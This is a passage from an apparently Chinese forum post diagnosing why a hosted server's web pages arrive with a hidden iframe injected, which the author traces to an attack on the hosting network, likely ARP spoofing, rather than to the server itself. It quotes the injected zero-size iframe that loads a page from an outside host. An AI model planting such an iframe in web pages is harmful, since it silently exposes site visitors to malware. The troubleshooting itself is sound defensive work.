<br />一台服务器 几乎所有网站打开网页 甚至HTML网页 都出现了<br /><iframe src="http://xxxdfsfd/web.htm" height=0 width=0></iframe><br />这种样式的代码 有的在头部　有的在尾部 部分杀毒软件打开会报毒<br />打开HTML或ASP PHP页面 在源码中怎么也找不到这段代码<br />分析原因<br />首先怀疑ARP挂马，用防ARP的工具又没有发现有arp欺骗<br />而且arp欺骗一般不会每次都被插入代码，而

1. 查过所有页面的源代码中并没有  代码. 但是下载htm、asp、aspx页面到本地机器后查看源文件都发现有这段代码.因此怀疑是 IIS配置文件的问题,可检查后没有发现任何问题,也没有任何修改的痕迹. 怀疑是系统被注入后门程序,再次在服务器本机上通过 wget 取回页面后也没有发现有这段代码. 因此断定是服务器所在的网络受到攻击,而不是服务器本身受到攻击.  2. 由于服务器是托管在机记,要确定是否是网络的问题要比查询局域网要难一点. 突然想到 服务器在机房的"邻居"是否正常,试了几个I